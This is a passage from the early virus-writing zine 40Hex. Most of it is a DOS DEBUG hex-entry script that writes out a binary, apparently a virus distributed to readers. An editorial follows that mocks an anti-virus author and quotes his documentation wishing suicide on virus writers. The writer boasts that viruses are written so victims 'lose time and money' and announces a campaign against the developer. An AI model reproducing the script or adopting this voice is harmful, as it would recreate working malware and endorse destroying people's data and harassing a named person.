e 1200 F3 D4 05 B2 FA 43 F0 D4 05 B2 FA 43 F1 D4 09 5B
e 1210 26 09 87 C4 A5 C3 CF 8E F2 52 E8 8C FC 4B 83 E4
e 1220 03 8E FC 98 1F D1 C8 01 ED 66 0B 52 70 72 2C 60
e 1230 0B CF EE F2 CF 50 E9 68 E1 E9 4B 19 E9 82 EF E8
e 1240 27 EA 2D AA 77 79 58 B1 0C A4 09 A9 AA EB 97 99
e 1250 5F 68 EA 11 54 10 9F 88 4E DF 0A 4A 7B CC 23 5E
e 1260 0C 4F 90 38 EA B1 73 BC F9 A9 42 D2 7E 42 86 9C
e 1270 84 D0 B9 3A 13 89 F1 A0 00 CE FB C6 DE 1D A6 68
e 1280 BC 55 09 62 25 47 B8 B8 87 5D 5B 8F BA E9 7A 13
e 1290 2E E0 97 33 2C FA E9 A5 13 EA CE B5 F8 05 25 DE
e 12A0 8A D7 8D E1 06 8F 1E 25 66 A8 25 36 9E E5 6E F5
e 12B0 65 BD E0 03 C9 24 AA 31 53 C7 C2 F8 D9 C7 F8 ED
e 12C0 39 34 D0 E8 5B EB 24 A2 7F 44 50 89 83 1B C7 84
e 12D0 2B 40 37 A2 A4 44 22 EA 85 98 E2 81 28 8A 04 41
e 12E0 88 AA 2A 89 AC 86 65 2A 4A 09 8B 87 FB 54 DE 08
e 12F0 E0 4D B6 1D E3 2C 3F C4 13 6A 83 0F C4 19 F1 24
e 1300 E8 35 E6 E6 F3 E0 FA 2C 08 B8 FC FC 52 1A 2E D8
e 1310 15 20 26 2F E2 53 1F E8 9B E2 F8 E5 20 C0 20 0C
e 1320 C6 A4 E3 E8 97 E2 F9 E5 3E E8 31 EB 12 AC CA 3E
e 1330 FD B7 75 BA FF AF 82 10 94 0F BD D1 44 D3 85 BF
e 1340 D0 E8 D9 E4 3D 70 AD A5 81 6B D6 7E C9 73 70 30
e 1350 7D 94 05 6A F0 37 73 98 7D 5F 94 05 6A 6E 36 AC
e 1360 42 A1 ED 3C 45 A1 93 40 22 62 4B 58 6F 42 DD 80
e 1370 FA F3 53 FC 1A 70 B9 A5 D4 AD A6 78 AD 6D 81 AD
e 1380 51 7F 7B C3 1D 6C 1E EB 54 F1 C6 C6 45 23 D6 24
e 1390 17 5E 0D B9 5E 1F B9 61 A6 0B C8 90 08 D7 C6 A5
e 13A0 BC 9C EE 54 2C 40 F6 D9 59 0D CD 67 03 47 D4 F3
e 13B0 D5 63 13 C5 02 22 2D E8 55 2A C0 3D 4F E1 3E 1D
e 13C0 61 3B B3 1F 55 FA E1 A0 C4 BE 16 C0 FF 3C F6 3C
e 13D0 6C 11 EB 54 F1 76 95 45 23 D6 24 17 59 06 B8 5E
e 13E0 1E B9 61 96 0B CB 90 1D 3D C4 E0 DB 89 BA DB 47
e 13F0 0A 75 E5 FF 6C 11 EB 52 10 61 E1 50 A0 56 00 E3
e 1400 37 31 0B DD 46 0C C5 2E 69 D4 2D 3A 54 28 92 2A
e 1410 46 DC D4 B3 E2 8B 05 E6 CA 2F D0 09 33 08 94 C6
e 1420 61 E2 C0 E4 96 45 23 D4 33 02 20 9D 15 8C 2E 4E
e 1430 D4 96 B8 3D EE E0 59 0D B3 59 1D FF 54 05 81 09
e 1440 2E FE D5 7C E2 D5 47 D7 D3 C2 E3 0F 24 18 54 05
e 1450 6D D5 39 D7 8C 38 29 A1 C1 E6 CA 2E DA 09 D9 FE
e 1460 16 7F E0 C4 46 29 16 05 08 96 C6 61 E2 5C C3 56
e 1470 05 E1 2D 85 02 20 9D 1C 8C 2E 4F D4 94 A2 8F 2E
e 1480 C9 D5 4A 2B 86 4A 3B CA 47 23 B4 1A 08 CA C6 58
e 1490 D7 C6 61 E2 5C C3 45 C7 23 37 31 61 16 4B E0 2A
e 14A0 F1 BB 2B 0D 94 D2 C0 FF 3D FF 3C CA D8 23 6C D7
e 14B0 23 53 2F 23 3D 84 E0 54 F1 D8 D4 45 23 D7 24 17
e 14C0 8E 3E B9 3D 77 E1 3E C5 C3 52 CA 08 FD C6 6C 1E
e 14D0 D8 6E 0E 9D 61 3E 59 C3 3D D8 E0 6D C4 E0 54 F1
e 14E0 D8 D4 C7 23 37 3E 61 16 4B E0 2A F1 BB 2B 0D 94
e 14F0 D2 C0 FF 3C FC 3C CA D8 23 6C D7 23 53 0B 23 19
e 1500 40 2D 54 37 00 41 85 61 D2 38 E0 96 24 18 5E 04
e 1510 BA 5C 15 B9 85 2D CB 3D C7 E0 16 7D 81 09 9F E1
e 1520 1E C8 59 11 D7 FF 2B 0F A3 54 E9 1E D5 85 02 2D
e 1530 90 69 0B 47 26 58 C6 1E D9 98 94 0B C0 18 CA 2F
e 1540 DA 09 9C 50 95 40 00 3D BF E1 3E 0D 60 38 D4 60
e 1550 14 F8 E1 DA 45 23 D1 45 0B D7 24 16 52 2D BD 52
e 1560 1B 0B FF 2E E1 D5 05 B9 6E A7 3C D4 0D EE 6C 05
e 1570 F0 CA 38 25 FC C9 A3 2C 85 02 2C 4D 0B 54 03 6D
e 1580 D5 F8 1E 9B C6 BD A1 18 E6 CA 2F DB 09 9F B5 68
e 1590 A1 C5 90 F8 1F 00 2D 2B 54 07 DE 3B 2D E9 96 31
e 15A0 FF 56 05 E2 37 3F 23 3D 33 1F 3D E7 E0 3F D4 B0
e 15B0 3D EC E0 54 04 80 09 73 F1 64 05 67 0F 2E 3F 2A
e 15C0 30 E6 E6 E2 1E A1 19 6C 14 48 39 3D 80 3C 8C 9E
e 15D0 73 8D 57 54 EA 38 24 3D 47 E1 8D 2D 32 59 0D 6E
e 15E0 0E 9C B2 16 47 11 93 F4 0B DC F7 EF 56 05 E3 9E
e 15F0 24 18 16 2E 14 2A 2E FF D5 40 3F 3D ED E0 52 15
e 1600 61 16 A7 3C 6C 05 F1 3D 26 1F 23 C0 D3 F1 38 94
e 1610 34 4A 22 5B 1C 09 9D 1A B8 8D 4D 38 8D 4F 21 E7
e 1620 22 60 19 86 08 55 C7 0B 05 4A 2B 5B 1D BA 87 05
e 1630 63 3E C4 61 14 FA 0E 5E C1 A3 96 EF E7 37 3C BB
e 1640 02 9F 0B FD 9D B3 16 C8 FF 3D 3E 1F 54 05 BD 09
e 1650 7F 21 C4 4D E7 96 85 E1 D2 24 1A 54 05 72 D5 46
e 1660 9F D4 C7 94 34 C0 C3 14 D9 08 95 1A 54 E5 46 24
e 1670 C5 90 5E B3 D2 1F 41 C6 F1 8B 2D 2B 54 2F 24 C4
e 1680 45 0B D7 4D E7 96 85 C9 D2 24 1A 8E 9F 0B FF 9D
e 1690 1C 86 05 EE CA 2E 17 2A 47 0B 76 E5 59 14 D7 6B
e 16A0 C2 85 A3 D4 D1 02 2F 93 5D E6 C2 DE 55 78 E0 F5
e 16B0 C7 BD A1 18 E6 CA 2E DF 09 72 C0 D7 22 5D B3 E2
e 16C0 CE 2A 50 E0 D4 2D 2C 5C F5 20 D4 0D 6A D2 EE A7
e 16D0 2A 45 0B D7 45 1B CA B3 13 8E 3A B9 3D E3 E0 DB
e 16E0 3B FF 8D 2E CB D5 55 59 16 D7 63 3E D8 6A C2 C6
e 16F0 B7 2A 8D 15 9E 24 16 55 F8 D3 F1 C7 94 C0 C0 15
e 1700 CA 2E A0 09 9E D2 31 46 2C 95 39 F6 B3 E3 08 1B
e 1710 39 B8 85 05 E1 1E 7F E1 D5 87 6A D2 C6 A7 2A EF
e 1720 2B 56 3D FF A0 32 BB 8C 2E C4 D5 9D EE CA 2E CB
e 1730 D5 55 63 3E DB 59 16 D7 6A D2 EE A7 2A 8D AB 37
e 1740 31 60 EB F5 C4 D4 B2 F6 D3 ED 20 CA 2E A1 09 9E
e 1750 54 95 90 5E BD E3 1F 03 98 08 1A 39 B8 85 05 0B
e 1760 23 D1 16 CA 45 23 D4 24 17 8E 3A B9 3D 72 E1 3E
e 1770 C1 6C 1F 48 3A 3D C5 E0 02 2D 16 8F 47 0A 48 E5
e 1780 19 52 1C 59 5F EA 18 54 37 EF DA 30 FF 23 D1 A3
e 1790 28 24 18 60 4B 50 D4 C4 25 02 3E DC D4 B2 57 59
e 17A0 07 6C 05 ED 20 CB 48 39 8C 2F D0 09 30 FF 23 D1
e 17B0 A3 37 3F B9 8E 41 2B 3D 73 E1 3E C1 6C 1D 48 38
e 17C0 3D C4 E0 3E 31 B8 F8 5A C3 46 7F CE 0B 47 11 7E
e 17D0 3B 16 C2 30 FF 96 24 19 65 48 37 E9 C7 94 C6 4A
e 17E0 20 5E 1E FE 5B 1D BB FE 06 09 E9 1A E3 5C 29 45
e 17F0 C1 0A 23 C4 07 3E E9 72 B5 96 8F 08 DD C6 A9 23
e 1800 D9 63 16 C4 A9 16 9B 08 21 39 94 E5 2D 19 80 C8
e 1810 18 CA 2E C3 D5 77 64 54 2B 41 F6 4D 3D 60 E5 08
e 1820 09 39 95 2E 4F 08 5E 2D 61 10 48 E0 EB 38 AE D5
e 1830 9B 94 07 C0 FF 85 4F 28 88 C8 B5 1E 9B BB 8C 2E
e 1840 99 D4 2D 2A 96 94 A9 3D CE E0 23 D1 A9 56 05 E2
e 1850 9C 05 BA 3D 32 1F A1 E8 0B 2C 94 EE CA 2E C3 D5
e 1860 47 0A 75 E5 69 06 7F C3 51 40 2D 3D 1A 1F A0 3D
e 1870 72 5C 1C 61 17 48 E0 52 15 1E DA 9C 94 D2 C0 FF
e 1880 85 F5 20 8F 94 23 8F 9D B9 3D BD E1 02 3E 0B 1F
e 1890 2D EE 8E 72 A0 8C 2E 5A D4 2D EC 8E C8 FF 86 05
e 18A0 08 FC C6 95 2E 2D 0B 3D 37 1F 6C 59 C3 FC 0D 63
e 18B0 3C DC 08 C2 C6 95 2E 46 57 5B C6 E1 A1 CB 08 0F
e 18C0 39 61 3E 72 C3 9E 4F 28 86 C0 FF 16 39 D7 8D F6
e 18D0 A7 D7 F6 A7 D4 45 23 D6 45 09 D6 05 0B DB 9D B9
e 18E0 61 86 08 6F C7 0B D9 9D B3 DB D9 23 3D EC E0 A0
e 18F0 3D 0B 3E 2E 11 2A 7E 7F F6 EF 23 6C DC E0 E6 0E
e 1900 08 C3 C6 95 2E 46 57 5B C6 E1 A1 19 08 0D 39 61
e 1910 3E 71 C3 86 C0 69 1D D9 23 5F E1 D0 B2 C7 D0 B2
e 1920 C4 63 16 C5 63 3C C5 23 3E DE B8 5E 1E B8 83 4F
e 1930 21 2A F0 86 F0 7E E0 95 98 1F 03 98 19 45 3E 09
e 1940 D2 C6 1E D2 85 02 2E 2D 01 3D E4 E0 6C 43 C3 54
e 1950 2D 49 F6 38 EF 96 24 1B 80 4D 0B 54 03 6E D5 F5
e 1960 20 EB 46 9E D5 C7 BD A1 CF E6 CA 2F D6 09 C8 FF
e 1970 8E 95 23 18 96 1E 1C 2D F6 5F C1 A3 5F E1 66 11
e 1980 4E A7 2A 8F 68 F2 85 D3 15 8F 23 DB D9 0B C6 2E
e 1990 07 2A 3E 95 2F 9E BB 8C 93 1F E3 A0 C5 88 F8 1F
e 19A0 00 9B 08 D5 C6 59 51 E5 BB 54 2D 56 F6 2E 29 2A
e 19B0 B3 1B 55 79 6F D5 C7 1C A1 16 E6 CA 2F D1 09 4F
e 19C0 A9 85 2D F7 5F C1 A3 5F E1 66 35 4E A7 2A 4E C7
e 19D0 96 F5 20 56 2F E2 16 C8 FF 3E D3 08 33 39 95 2E
e 19E0 9E BB 2E 9F 1F E3 A0 C5 5A C0 7A F0 39 F6 4F E3
e 19F0 08 D5 C6 BB 54 2D 58 F6 7F 64 F6 2E 26 2A B3 1B
e 1A00 55 79 6F D5 C7 94 1A C0 FF 3C F6 3C 87 4C 97 2A
e 1A10 96 6A C2 38 2E E5 F1 66 27 45 23 D4 24 13 8C 9E
e 1A20 09 D0 C6 08 D5 C6 0B D8 4D 30 8D 4D 38 8D 57 1F
e 1A30 C3 A0 C5 3E 28 BB 6C 43 C3 DB 47 0B 4A E5 FF 5F
e 1A40 81 1F 2B 0E D0 D2 85 02 23 46 5F 5B C6 E1 A0 C7
e 1A50 23 D3 F5 20 CA 2F D0 09 38 29 55 F1 87 96 8F A3
e 1A60 9C B3 17 2A F0 86 F0 49 E6 4C E3 BB 8C 2D E3 3D
e 1A70 E9 E0 2A D0 79 F0 2D 17 6D C4 E0 54 05 81 08 38
e 1A80 2F 6C 42 C1 DB F4 08 CA 46 D7 B2 8F E1 16 8F 95
e 1A90 22 47 23 5A C6 1E DA C0 FF A0 C7 23 5C 0E 09 E6
e 1AA0 1A BB 3E 12 A9 55 F1 08 56 05 E2 56 2F E2 A0 33
e 1AB0 BB 2A F0 86 F0 49 E6 4D E3 0B D6 2E CE D5 9F 1F
e 1AC0 C3 5E C5 3E 30 58 D7 C6 61 16 A7 3C 6C 40 C3 DB
e 1AD0 F5 28 CA 46 D7 3D C7 23 FE 0E 95 22 47 23 5A C6
e 1AE0 1E DA C0 FF A0 C7 23 5C 0E 09 E1 1A BB 3E 10 D3
e 1AF0 87 4C 97 2A 4C F7 E5 F1 66 27 45 23 D4 24 15 8F
e 1B00 3D BB 8C 39 F6 B3 E3 08 D6 C6 A0 E6 18 EB 23 38
e 1B10 27 8E 47 0B 74 E5 63 16 C4 59 50 E2 1E 18 C8 FF
e 1B20 5F 81 1F E5 C1 A3 37 3E 61 16 48 E0 52 18 1E D9
e 1B30 B3 E3 52 35 23 D3 F5 20 CA 2F D0 09 94 6A A2 39
e 1B40 6A C2 C6 D7 53 10 A3 37 31 BA 8E 9F B6 6B A1 C5
e 1B50 9B 39 F4 3D C4 E0 E6 18 61 23 B0 F8 8E 98 61 3E
e 1B60 59 C3 6C 43 C3 DB D9 6A 92 39 C8 D2 85 02 2D 47
e 1B70 23 5B C6 67 26 38 EC A0 C5 67 0B 05 E6 E6 06 FF
e 1B80 3C F3 3C 5E 08 E5 83 F2 B0 55 F1 E5 2B C1 A3 37
e 1B90 3E B8 96 87 1D 2C 96 37 8D 9D B9 2A D0 86 F0 2E
e 1BA0 E3 D5 7D E1 83 9D 61 3E 59 C3 6C F2 69 6C 43 C3
e 1BB0 DB 96 58 D5 C6 6E 0D 9E FF 2B C9 60 E2 C3 A3 37
e 1BC0 3E 59 F6 C6 1E 5A 48 E0 A1 72 E6 6C C6 E0 CA 2F
e 1BD0 D2 09 05 1B 85 11 60 E2 D6 63 16 C7 02 2D 9E BB
e 1BE0 8C 90 5E B3 E3 18 2A D2 18 8B 85 08 FC C6 61 3E
e 1BF0 59 C3 6C 41 C3 9C 3F A9 55 F1 F0 56 05 E1 37 3E
e 1C00 6B 1E 7F 6E D5 C7 2B 2B C9 94 D7 2D E1 16 C0 58
e 1C10 D5 C6 FF 2D 2F D9 09 9D B3 DB 97 19 8C D9 18 16
e 1C20 46 E7 D0 45 23 D4 24 18 8E 87 B9 83 78 86 F0 39
e 1C30 F4 2D 98 A2 85 9C 70 3D C7 E0 2D 9D 61 3E 59 C3
e 1C40 60 E5 51 50 2E F9 D5 46 CF D0 85 18 56 04 F2 37
e 1C50 30 61 16 48 E0 2B C9 95 DE 05 A3 54 07 9A D8 11
e 1C60 EE CA 05 44 D3 D9 09 E6 1A B8 8E 3E CE C7 EE 06
e 1C70 43 EB 02 51 E9 9E 4B B4 36 4F 50 02 B9 7E 46 44
e 1C80 13 94 B9 B8 76 43 0B F5 80 4E 58 CB 57 9E BA 55
e 1C90 57 D0 E8 88 FD 0A 2E A0 7C 3C A2 E0 26 F3 E1 2B
e 1CA0 10 2E A6 24 C6 65 F1 F9 E5 3D C7 20 8A 07 26 13
e 1CB0 E8 CE 9C EE 3B 89 72 C9 8D C8 08 BF B4 36 9F B2
e 1CC0 98 A7 65 AA EF BF 4B 68 6D 5F 00 49 E6 82 41 54
e 1CD0 3E 9F A2 66 05 1B 13 40 54 70 B8 26 50 2E D9 05
e 1CE0 66 03 61 59 CE 4F EE 05 CC F1 70 DA 2B DD E2 56
e 1CF0 F7 3E FB D7 40 C1 0F E8 67 F8 8F EC 30 E2 20 EF
e 1D00 AA FA D7 4C E1 23 E8 DF 11 B2 DA DD 66 2F 9E 11
e 1D10 3D 08 EC 16 40 36 72 03 FB 28 C8 0D 71 DC BA 22
e 1D20 E3 50 5F DD 74 59 73 4C 8E 41 04 54 DC 25 6F 79
e 1D30 C1 9D 73 39 99 C1 66 99 18 67 6E E5 A7 E8 25 FD
e 1D40 0A 52 54 AF 19 8F F1 56 8F 4A 57 6C C3 CE E0 ED
e 1D50 2A F1 D0 04 DF 24 C2 2B C6 C5 19 CE C1 FC CF AA
e 1D60 FB E0 CB 36 40 37 01 10 DE 53 04 48 AC 56 00 76
e 1D70 C0 94 D3 B6 A4 D3 34 6D EB 40 31 7D BF 70 35 65
e 1D80 90 96 C0 3E 09 19 8E 53 45 40 D0 F6 08 90 3E A7
e 1D90 36 04 54 35 0E 7D 93 EF 06 3D A1 5D 36 39 FE 61
e 1DA0 19 08 9A 1E 5D 36 EB 34 FB 2E A6 3D A8 3A 41 2E
e 1DB0 D9 25 79 03 4A 80 DB 53 C6 F4 9C 06 28 13 8F 20
e 1DC0 1F 00 08 93 06 8E 0F 52 CE AA 06 CF 3E E6 CE 61
e 1DD0 ED 60 D3 28 53 34 F3 2F 6B C1 A4 E0 12 C8 2C D6
e 1DE0 80 F6 EE 6F C5 67 C2 FD 63 43 F7 78 E4 91 F3 2F
e 1DF0 E0 12 C8 2C D6 80 F6 EE 6F C5 6B C2 FD 63 4F F7
e 1E00 78 E6 91 EE 6D C5 65 C2 FD 4B E8 74 E4 C8 2C D6
e 1E10 80 F6 28 24 35 28 97 D7 87 E5 4B 5B 7F F8 8A 2C
e 1E20 D3 75 0B FB 1D CB 01 E1 E9 71 C7 74 D6 1F 2F 7B
e 1E30 07 E9 0D F7 A1 D7 09 97 F6 F2 54 18 F6 E3 93 74
e 1E40 25 93 ED A6 FA 4E C0 3D 83 28 A0 24 27 FA 45 C0
e 1E50 2F 01 53 6A E8 CA FF 0D 34 2F 91 12 B2 36 CA F7
e 1E60 D7 B4 E9 36 30 0F 74 25 93 ED A6 FB F2 D8 67 03
e 1E70 A6 D6 80 CE DE EC 34 EA D7 20 FC 9F FA 63 BF 23
e 1E80 C4 7A C9 59 DD DF 02 F9 DB F9 E9 30 FA E8 2B 16
e 1E90 E4 07 1F 02 C0 32 50 9E 13 00 A8 CB 58 D9 25 0C
e 1EA0 26 EC 36 28 13 0E A9 15 0E 26 D4 06 2A 13 0A 3B
e 1EB0 DF 83 CE 9D EC 30 D9 F6 EE AC C4 04 7B 34 98 D0
e 1EC0 4B 82 2F CA C8 5A 94 14 D9 22 51 DA DD CF A8 E5
e 1ED0 CE 63 EC B3 A9 52 F8 4F 0E B6 87 45 8A CF 9F 1C
e 1EE0 57 B8 E8 A1 3A 62 AA CE 97 40 CD 9C 29 40 8F DA
e 1EF0 B1 75 C6 BA 1C 53 AF EE AA 53 FB A9 53 A2 A9 EE
e 1F00 D4 EC 9A CB E1 FB D0 EC 9A D5 E7 9A CF EC FB CE
e 1F10 EA F2 BC E6 FC BC FD F2 D9 89 82 BC EF F3 CF E1
e 1F20 B0 91 E0 9A DD E4 9A BB D7 D1 F2 D3 C3 EA C6 C7
e 1F30 BB 89 F3 D2 89 F2 DD E4 F8 C9 FB FD B8 1D B3 92
e 1F40 B6 00 73 B4 94 63 BF DC B9 87 7D 9A 31 9F 68 5D
e 1F50 01 04 8C 26 92 FA 89 5C 27 62 5B AF BC 9C 56 45
e 1F60 74 25 BE 74 FD 5F 74 89 B9 0A D0 E9 3B F6 2E A6
e 1F70 35 B3 02 ED E8 CF EE 74 D4 FB C7 CD 22 F9 F1 63
e 1F80 EF 72 CE D7 56 E4 56 FB C4 3E D9 5B DD DF EA 11
e 1F90 E3 14 D7 7E 43 DD F1 61 EF 74 CE D4 DF CE 7A 05
e 1FA0 EA D7 F4 EC 5C FB C4 E2 C9 4D DD 37 31 FB ED 6A
e 1FB0 08 E1 55 FC 26 13 E9 08 F8 E8 A1 F8 1A E8 A8 C6
e 1FC0 D3 1C B9 EC F3 6D 47 F9 E0 63 D3 69 CC F3 45 FE
e 1FD0 78 EA E3 14 26 5A DF D5 53 16 83 DC 0F 76 03 FB
e 1FE0 61 CD 0E E0 E8 78 F6 6B D7 54 F9 DD 6B C8 5C C4
e 1FF0 E8 0C F6 A0 D6 CE C5 F5 51 E2 7A A6 3A 1B 69 C4
e 2000 ED E9 B9 F4 89 F1 9A D6 08 10 3E 89 37 83 D9 0F
e 2010 72 23 20 FF CD 15 F7 A5 FC 1C D1 CC E8 02 F8 5C
e 2020 3E 80 DA 10 80 0E 97 2F 36 B5 05 B3 1A 88 DA 31
e 2030 88 C9 3E 88 FA CE 8A F2 C2 28 9B E7 0B 19 FC 88
e 2040 C9 3E B3 18 7C 25 E7 28 6D 3D 87 17 18 17 F2 31
e 2050 CF BF 27 10 80 0E 93 2F 36 C1 1D 7E 1B 25 19 38
e 2060 A6 3C 10 22 1E 91 2F 36 3F 0D A9 1A 38 D1 86 0B
e 2070 5A 84 17 18 10 F4 0E 58 2E F0 33 09 45 CF 4C FF
e 2080 CE D3 EA 33 23 1E 95 05 83 32 DD D8 3A C7 1E E9
e 2090 35 56 33 CB 96 F2 CB C0 17 35 73 2F 3D 83 28 A0
e 20A0 24 27 FA FE C0 FB 83 CC E5 47 31 93 75 2F FA F2
e 20B0 C0 EB 42 38 14 52 CD FB 89 CC 02 DC 7B A0 C6 FA
e 20C0 EB 5F A5 D3 DC 7A A0 CB 7A 27 61 FB DD E9 F5 F5
e 20D0 E8 56 F9 46 AC 71 F2 47 87 B9 6C 17 52 6B 9F 84
e 20E0 AC E9 8A 6B 9F 86 AC CF 8D B3 17 8C E9 BD 8C B3
e 20F0 18 A4 AE 99 FA AE 15 50 E6 17 50 0D 9A 8A 81 E9
e 2100 88 AD 5B 29 AF 99 D5 EE 17 48 A2 86 34 52 BF 33
e 2110 2C 8A 03 5B 64 B9 77 71 E5 AD DE F3 83 EF 06 9E
e 2120 A2 01 76 3D 8E 20 56 24 9F 7F 23 CF 5D 03 CE 01
e 2130 EA 74 90 AD 63 96 59 81 90 6B EA 74 8D 15 83 9C
e 2140 4D E6 67 29 96 AC 81 19 9D 88 B4 0F A3 AB A7 17
e 2150 92 0A BB A9 A7 2D 86 D3 81 78 7F 46 19 A5 7A B4
e 2160 0F B3 4D A7 AB 28 FE 85 C0 3B D5 90 3A 5A 6F 0D
e 2170 65 A3 7C 15 5B 71 0B DF 1F A3 C7 1F FD 10 4F A4
e 2180 C0 6B A0 91 D0 BB 20 C0 D9 3D 2D 02 FA E8 95 FA
e 2190 39 18 23 21 06 9D 2D 36 E8 28 35 09 D6 D5 CE 21
e 21A0 A8 09 D6 0C C9 B7 06 10 1A A2 10 22 A8 09 B2 1E
e 21B0 12 1A F0 9A DD F0 32 DD 06 7D 86 18 2D B0 C0 75
e 21C0 F9 1E 2B 3E 68 2D 21 F0 92 3E 22 D0 F6 CE 60 E9
e 21D0 38 B3 48 30 50 8E 43 A5 99 A2 03 B3 6E 3E 43 A8
e 21E0 76 B6 BB 97 10 A2 5B 23 65 5B 4B 64 5B 3A 86 AC
e 21F0 C3 28 4B E8 6B FA 1A B2 A9 53 B4 D7 B0 B3 83 7C
e 2200 E4 64 7C 07 65 C4 9C 26 27 96 8A 94 B3 D7 7C CA
e 2210 87 8F BB 4B 5D 08 EC 2E 13 37 00 BA 3D 8F 20 9D
e 2220 25 08 B0 60 03 3D 89 38 71 25 08 9A 0E 42 36 26
e 2230 1D 13 72 24 D0 02 75 9A C1 14 FE 26 1C 1B 73 61
e 2240 EB 2E 87 73 25 08 98 1E 44 36 2E AD 1D 64 03 3D
e 2250 FF 10 9D 25 BB D0 89 E3 F7 40 2C D3 74 DC 48 53
e 2260 9F 37 00 0F D8 2E 16 14 43 C4 E9 E8 26 13 5B A5
e 2270 D0 14 08 9B 07 AF FB C3 AF D6 5B 75 AA 24 26 3D
e 2280 80 11 71 43 C4 EA 89 CE D0 9C 08 9C 06 A8 36 2E
e 2290 85 73 25 08 9A 1E 44 36 2E AF 1D 64 03 35 3B AC
e 22A0 1C 32 54 F0 53 9E 12 00 25 D2 29 E5 50 40 2C D3
e 22B0 74 DC 3D 8B 29 21 ED 65 10 0F 08 28 07 54 D4 F8
e 22C0 DC 3D A1 46 36 2E AD 0D 62 03 3D 8B 28 77 25 08
e 22D0 EC 36 A8 36 9D E5 46 89 C3 43 81 58 17 00 E6 60
e 22E0 0C 08 B2 47 02 2A 46 22 65 03 7E 4E CF 08 93 3E
e 22F0 76 37 01 52 35 8B 60 17 2E 85 3C 24 AD 55 02 08
e 2300 B0 2D 02 61 0F 7E 4E 2E AD 35 DF 02 3D 8E 30 CE
e 2310 24 CF 6A FE A7 75 06 D9 ED EB E9 3D FE 28 42 24
e 2320 53 DB 81 40 15 FF D8 FB 61 C4 EF 1E C4 F7 40 08
e 2330 B1 4E 04 3D A2 4F 31 B0 25 FB 7D C4 15 1F AF C9
e 2340 B0 27 FB 27 27 F9 72 C7 FB C4 C7 FB 89 C7 FB 35
e 2350 C1 4B 5D 75 42 BB BA 30 B9 72 13 2E A6 24 D6 65
e 2360 F1 F9 7F 48 CF CD 3D 80 28 8F 23 26 67 11 75 42
e 2370 BB BA 30 B9 72 13 2E A6 24 D6 65 F1 F9 7F 48 E9
e 2380 2D E8 34 CE AE E7 35 83 78 8A 83 78 D7 83 0C 98
e 2390 7C 8E 35 A6 78 86 83 78 59 7D 84 E9 AF 2E AF 25
e 23A0 75 03 3D 89 18 64 25 08 9F 1E 5D 36 2E AA 15 7D
e 23B0 03 3D A3 5F 36 2E AF 1D 7F 03 3D 89 38 92 25 08
e 23C0 9A 16 B6 36 C3 CE 12 E8 5F F4 22 2B F6 C3 D4 A0
e 23D0 7D 0E 30 C9 15 9D 28 25 01 F1 92 1B 0D 87 38 8B
e 23E0 2E 96 49 D4 59 EF DD F6 97 2B F6 91 D5 3D C3 CE
e 23F0 42 E7 A0 AD 90 11 B3 3F BD 83 32 9E D0 9B AB 76
e 2400 30 5B 8B 35 86 AB BE B6 96 A0 DF 89 CD 81 8B 35
e 2410 86 A3 BE B6 96 A0 DF 89 CD 95 83 30 9E D0 9B B6
e 2420 26 A0 19 88 57 D7 AD E5 70 BC 5F 70 4C 5E 70 24
e 2430 5E B6 26 A0 19 88 90 16 AB C3 BD 31 90 67 B3 3D
e 2440 BD 45 46 78 19 EF B6 52 A8 FE 88 30 5B 8B 79 9E
e 2450 A1 BE 67 52 98 5F AB B4 98 AD BE 70 F1 5E 70 91
e 2460 41 21 28 AF 23 E2 BE 20 AF B6 B6 A4 B9 1B 6E BC
e 2470 7A 55 56 97 AD 71 70 BD 40 1F D0 E8 08 93 0F 33
e 2480 50 E2 DF D8 2E 87 6A 25 08 9D 06 5B 36 2E A8 0D
e 2490 7B 03 3D 8B 10 66 25 08 98 3E 51 36 2E AD 1D 7F
e 24A0 03 3D 8B 38 92 25 08 98 16 B6 36 C3 26 42 53 9D
e 24B0 33 00 9F 96 23 DB AA D8 0B 81 37 26 13 83 C3 03
e 24C0 E2 F7 8B CB 59 8B D9 59 B4 60 EB 1D 56 E8 02 00
e 24D0 45 69 5A 0E 81 EA A0 23 1F B9 D8 0B 87 D6 81 34
e 24E0 26 13 83 C6 03 E2 F7 EB 08 80 EC 20 E8 89 01 EB
e 24F0 DB 81 EE 75 FF 80 3C 01 75 02 5E C3 06 1F E9 30
e 2500 DC 00 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A 1A
rcx
2402
w
q
------------------------------------------------------------------------------
HR
--
Si
Smaug
Yup, thats right, no more AA posts allowed.
--
40Hex Volume 1 Issue 2 0007
Now a word from a real dick
When SSS told me how much of a dick this guy I'm about to tell you
about is I didn't belive him. His name will be kept, because if we
mention it he'll get all souped and think he's public enemy number
one in the virus community.
Who he is, is the author of a very sad anti-virus program and virus
scanner called FLU-SHOT and VIR-X, respectivly. What the man is,
is a sad case who wallows in the shadow of John McAffe and curses
to his bitter self why he is not a popular anti-virus author. The
reason is simple. His product sucks. Well lets put it this way,
his self proclaimed 'great' scanner fails to detect over 60% of all
viruses out there. On top of that, it was very sinple for a
person, who shall remain nameless, to infect his virus scanner, and
send out trojan copies all over the USA. The product, FLU-SHOT, is
the most annoying, false-alarm causing, piece of trash on the
market. Nuff said on the subject.
What makes us to pissed at said asshole? Well, take into mind the
following, from the documentation of FLU-SHOT.
------------------------------------------------------------------------------
The Challenge to the Worm
=========================
When I first released a program to try to thwart their demented
little efforts, I published this letter in the archive (still in
the FLU_SHOT+ archive of which this is a part of). What I say in
it still holds:
As for the designer of the virus program: most
likely an impotent adolescent, incapable of
normal social relationships, and attempting to
prove their own worth to themselves through
these type of terrorist attacks.
Never succeeding in that task (or in any
other), since they have no worth, they will one
day take a look at themselves and what they've
done in their past, and kill themselves in
disgust. This is a Good Thing, since it saves
the taxpayers' money which normally would be
wasted on therapy and treatment of this
miscreant.
If they *really* want a challenge, they'll try
to destroy *my* hard disk on my BBS, instead of
the disk of some innocent person. I challenge
them to upload a virus or other Trojan horse to
my BBS that I can't disarm. It is doubtful the
challenge will be taken: the profile of such a
person prohibits them from attacking those who
can fight back. Alas, having a go with this
lowlife would be amusing for the five minutes
it takes to disarm whatever they invent.
Go ahead, you good-for-nothing little
slimebucket: make *my* day!
------------------------------------------------------------------------------
Funny isen't it? Well Mr. Dickburg, I am not an adolesent, nor am
I impotent. I lead quite a healty social life, and have no sucidal
urges. What I am is a person who (mabey because of some deep down
psycological disorder) finds joy in seeing some geeked out,
computer nerds system go down the drain in a flash.
Oh yes there are others like me out there, many others. It (virus
writing) is a joke. It is done for a good laugh, to see dickheads
like you lose time and money. So my friend, at this time I start
an active campain after you ass.
